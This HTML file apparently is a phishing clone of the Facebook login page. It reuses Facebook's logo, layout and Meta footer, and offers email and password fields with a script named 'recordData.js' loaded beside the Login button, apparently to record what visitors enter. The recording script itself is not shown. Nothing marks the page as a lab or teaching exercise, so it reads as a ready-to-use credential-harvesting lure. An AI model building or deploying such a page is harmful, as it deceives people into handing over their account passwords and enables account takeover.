<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    
    <title>myFacebook Landing Page</title>
  </head>

  <body style="position:absolute; size: 100%; overflow-x:hidden">
    <div style="background-color: #F0F2F5;  ">
      <div class="modal-body row">
        <div class="col-md-6" style="padding-top:10%; padding-bottom:10%">
          <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" class="w-50" style="margin-left:22%; justify-content:center">
          <h2 style="margin-left:27%; font-weight: normal;">Connect with friends and the world around you.</h2>
        </div>

        <div class="col-md-6" style="padding-top:5%; padding-bottom:5%; justify-self: center;">
          <div class="col align-self-end">
            <div class="container-fluid">
              <div class="col-md-6">
                <div class="card shadow-2-strong" style="border-radius: 1rem;">
                      <div class="card-body p-5 text-center">
                        <div class="form-outline mb-4"> 
                          <input type="email" id="typeEmailX-2" class="form-control form-control-lg" placeholder="Email or phone number"/>
                        </div>
            
                        <div class="form-outline mb-4">
                          <input type="password" id="typePasswordX-2" class="form-control form-control-lg" placeholder="Password"/>
                        </div>
                    
                        <button class="btn btn-primary btn-lg btn-block" id="myButton" type="submit" style="width:100%">Login</button>
                        <script src = "recordData.js"></script>
  
                        <br><br>
                        <a href="#!">Forgot password?</a>
            
                        <hr class="my-4">
            
                        <button class="btn btn-lg btn-block btn-primary" style="background-color: #36A420;" type="submit"><i class="fab fa-google me-2"></i> Create new account</button>
            
                      </div>                
                  </div>
                  <br>                  
                  <div class="row justify-content-center">
                  Create a Page for a celebrity, brand or business. 
                  </div>   
                </div>
              </div>
            </div>
          </div>
        </div>
    </div>

  <!-- Footer -->
  <footer class="text-center text-lg-start text-muted">
    <div>
      <!-- Languages and Copyright -->
      <div class="text-center p-4" style="background-color: rgba(255, 255, 255, 0.05);">
          <a href="#"  style="color: #737373;">English</a>&nbsp;
          <a href="#" style="color: #737373;">Filipino</a>&nbsp;
          <a href="#" style="color: #737373;">Bisaya</a>&nbsp;     
          <a href="#" style="color: #737373;">Español</a>&nbsp;
          <a href="#" style="color: #737373;">日本語</a>&nbsp;
          <a href="#" style="color: #737373;">한국어</a>&nbsp;
          <a href="#" style="color: #737373;">中文(简体)</a>&nbsp;
          <a href="#" style="color: #737373;">العربية</a>&nbsp;
          <a href="#" style="color: #737373;">Português (Brasil)</a>&nbsp;
          <a href="#" style="color: #737373;">Français (France)</a>&nbsp;
          <a href="#" style="color: #737373;">Deutsch</a>&nbsp;

          <hr class="my-4">

          <a href="#"  style="color: #737373;">Sign Up</a>  &nbsp;
          <a href="#" style="color: #737373;">Log In</a>  &nbsp;
          <a href="#" style="color: #737373;">Messenger</a>   &nbsp;  
          <a href="#" style="color: #737373;">Facebook Lite</a> &nbsp;
          <a href="#" style="color: #737373;">Watch</a> &nbsp;
          <a href="#" style="color: #737373;">Places</a>  &nbsp;
          <a href="#" style="color: #737373;">Games</a> &nbsp;
          <a href="#" style="color: #737373;">Marketplace</a> &nbsp;
          <a href="#" style="color: #737373;">Facebook Pay</a>  &nbsp;
          <a href="#" style="color: #737373;">Oculus</a>  &nbsp;
          <a href="#" style="color: #737373;">Portal</a>  &nbsp;
          <a href="#" style="color: #737373;">Instagram</a> &nbsp;
          <a href="#" style="color: #737373;">Bulletin</a> &nbsp;
          <a href="#" style="color: #737373;">Local</a> &nbsp;
          <a href="#" style="color: #737373;">Fundraisers</a> &nbsp;
          <a href="#" style="color: #737373;">Services</a> &nbsp;
          <a href="#" style="color: #737373;">Voting Information Center</a> &nbsp;
          <a href="#" style="color: #737373;">Groups</a> &nbsp;
          <a href="#" style="color: #737373;">About</a> &nbsp;
          <a href="#" style="color: #737373;">Create Ad</a> &nbsp;
          <a href="#" style="color: #737373;">Create Page</a> &nbsp;
          <a href="#" style="color: #737373;">Developers</a> &nbsp;
          <a href="#" style="color: #737373;">Careers</a> &nbsp;
          <a href="#" style="color: #737373;">Privacy</a> &nbsp;
          <a href="#" style="color: #737373;">Cookies</a> &nbsp;
          <a href="#" style="color: #737373;">Ad Choices</a> &nbsp;
          <a href="#" style="color: #737373;">Terms</a> &nbsp;
          <a href="#" style="color: #737373;">Help</a> &nbsp;
        <br><br>
        Meta © 2022
      </div>
    <!-- Copyright -->
    </div>
  </footer>
  <!-- Footer -->

  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
</body>
</html>